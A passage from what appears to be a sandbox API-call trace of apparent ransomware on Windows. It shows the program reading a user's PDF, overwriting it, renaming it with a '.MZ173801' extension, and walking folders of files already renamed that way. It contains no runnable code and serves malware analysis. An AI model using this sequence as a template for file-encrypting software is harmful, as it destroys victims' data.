GRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.489] GetCurrentThreadId () returned 0x1358 [0122.489] GetCurrentThreadId () returned 0x1358 [0122.489] GetCurrentThreadId () returned 0x1358 [0122.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.490] GetCurrentThreadId () returned 0x1358 [0122.490] GetCurrentThreadId () returned 0x1358 [0122.490] GetCurrentThreadId () returned 0x1358 [0122.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Vh7qZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\vh7qz.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.490] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.490] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.490] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x52ad [0122.490] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.490] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x52ad, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x52ad, lpOverlapped=0x0) returned 1 [0122.491] CloseHandle (hObject=0x408) returned 1 [0122.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Vh7qZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\vh7qz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.493] WriteFile (in: hFile=0x408, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x52ad, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f424*=0x52ad, lpOverlapped=0x0) returned 1 [0122.496] CloseHandle (hObject=0x408) returned 1 [0122.496] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Vh7qZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\vh7qz.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Vh7qZ.pdf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\vh7qz.pdf.mz173801")) returned 1 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] GetCurrentThreadId () returned 0x1358 [0122.497] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1e6e60, ftCreationTime.dwHighDateTime=0x1d5ea7c, ftLastAccessTime.dwLowDateTime=0xf1a07be0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0xf1a07be0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x52ad, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Vh7qZ.pdf", cAlternateFileName="")) returned 0 [0122.497] GetLastError () returned 0x12 [0122.497] FindClose (in: hFindFile=0xa1bc08 | out: hFindFile=0xa1bc08) returned 1 [0122.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xaa4a1001, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa4a1001, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bcb0 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xaa4a1001, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa4a1001, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff39a30, ftCreationTime.dwHighDateTime=0x1d5ed79, ftLastAccessTime.dwLowDateTime=0x83d4a70, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0xaa2d73a8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9bc7, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="43I3.xls.MZ173801", cAlternateFileName="43I3XL~1.MZ1")) returned 1 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e73bb20, ftCreationTime.dwHighDateTime=0x1d5e31e, ftLastAccessTime.dwLowDateTime=0x79a3df0, ftLastAccessTime.dwHighDateTime=0x1d5e834, ftLastWriteTime.dwLowDateTime=0xaa2d73a8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1025f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="46ryC8o_wzpn1bi N7KV.xlsx.MZ173801", cAlternateFileName="46RYC8~1.MZ1")) returned 1 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf60a4ef0, ftCreationTime.dwHighDateTime=0x1d5e576, ftLastAccessTime.dwLowDateTime=0xe8cb8160, ftLastAccessTime.dwHighDateTime=0x1d5f03d, ftLastWriteTime.dwLowDateTime=0xaa36fd62, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="fYWa4.pdf.MZ173801", cAlternateFileName="FYWA4P~1.MZ1")) returned 1 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd47c1270, ftCreationTime.dwHighDateTime=0x1d5e236, ftLastAccessTime.dwLowDateTime=0x100349e0, ftLastAccessTime.dwHighDateTime=0x1d5f0dc, ftLastWriteTime.dwLowDateTime=0xaa396168, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1254c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="m8z Dy6SjgFjsVAZC.pps.MZ173801", cAlternateFileName="M8ZDY6~1.MZ1")) returned 1 [0122.497] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.497] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.497] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ff165b0, ftCreationTime.dwHighDateTime=0x1d5e4c5, ftLastAccessTime.dwLowDateTime=0x2860e060, ftLastAccessTime.dwHighDateTime=0x1d5e33f, ftLastWriteTime.dwLowDateTime=0xaa396168, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1800d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="MkfvC5YVoY.csv.MZ173801", cAlternateFileName="MKFVC5~1.MZ1")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd505c450, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x4ce59df0, ftLastAccessTime.dwHighDateTime=0x1d5e95b, ftLastWriteTime.dwLowDateTime=0xaa3bc27f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xeb4d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="N68wVE30d.xls.MZ173801", cAlternateFileName="N68WVE~1.MZ1")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de1bf80, ftCreationTime.dwHighDateTime=0x1d5ec40, ftLastAccessTime.dwLowDateTime=0x4a210cf0, ftLastAccessTime.dwHighDateTime=0x1d5ed0f, ftLastWriteTime.dwLowDateTime=0xaa3bc27f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd1aa, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Ons82gm.pdf.MZ173801", cAlternateFileName="ONS82G~1.MZ1")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eafa8c0, ftCreationTime.dwHighDateTime=0x1d5ebf0, ftLastAccessTime.dwLowDateTime=0x7ba1e3a0, ftLastAccessTime.dwHighDateTime=0x1d5e2db, ftLastWriteTime.dwLowDateTime=0x7ba1e3a0, ftLastWriteTime.dwHighDateTime=0x1d5e2db, nFileSizeHigh=0x0, nFileSizeLow=0x11e2c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="peBrvrQ9V.ots", cAlternateFileName="PEBRVR~1.OTS")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0x68294140, ftLastAccessTime.dwHighDateTime=0x1d5ee31, ftLastWriteTime.dwLowDateTime=0x68294140, ftLastWriteTime.dwHighDateTime=0x1d5ee31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="PlN2", cAlternateFileName="")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.498] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0x68294140, ftLastAccessTime.dwHighDateTime=0x1d5ee31, ftLastWriteTime.dwLowDateTime=0x68294140, ftLastWriteTime.dwHighDateTime=0x1d5ee31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bb28 [0122.498] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0x68294140, ftLastAccessTime.dwHighDateTime=0x1d5ee31, ftLastWriteTime.dwLowDateTime=0x68294140, ftLastWriteTime.dwHighDateTime=0x1d5ee31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a646200, ftCreationTime.dwHighDateTime=0x1d5ee97, ftLastAccessTime.dwLowDateTime=0xe57d9bd0, ftLastAccessTime.dwHighDateTime=0x1d5e6ae, ftLastWriteTime.dwLowDateTime=0xe57d9bd0, ftLastWriteTime.dwHighDateTime=0x1d5e6ae, nFileSizeHigh=0x0, nFileSizeLow=0x12e9, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="aZ5k5HRyxWcmwTH.odt", cAlternateFileName="AZ5K5H~1.ODT")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d327330, ftCreationTime.dwHighDateTime=0x1d5e801, ftLastAccessTime.dwLowDateTime=0x9bc12880, ftLastAccessTime.dwHighDateTime=0x1d5e768, ftLastWriteTime.dwLowDateTime=0x9bc12880, ftLastWriteTime.dwHighDateTime=0x1d5e768, nFileSizeHigh=0x0, nFileSizeLow=0x17ca0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="Kf_sHWxJdyzMv.ods", cAlternateFileName="KF_SHW~1.ODS")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.498] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc651760, ftCreationTime.dwHighDateTime=0x1d5e809, ftLastAccessTime.dwLowDateTime=0xd70a6520, ftLastAccessTime.dwHighDateTime=0x1d5ed10, ftLastWriteTime.dwLowDateTime=0xd70a6520, ftLastWriteTime.dwHighDateTime=0x1d5ed10, nFileSizeHigh=0x0, nFileSizeLow=0x119aa, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="PF1Hk1o6iJ_U1EnULHZ.csv", cAlternateFileName="PF1HK1~1.CSV")) returned 1 [0122.498] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.498] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.498] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\PF1Hk1o6iJ_U1EnULHZ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\pf1hk1o6ij_u1enulhz.csv"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, 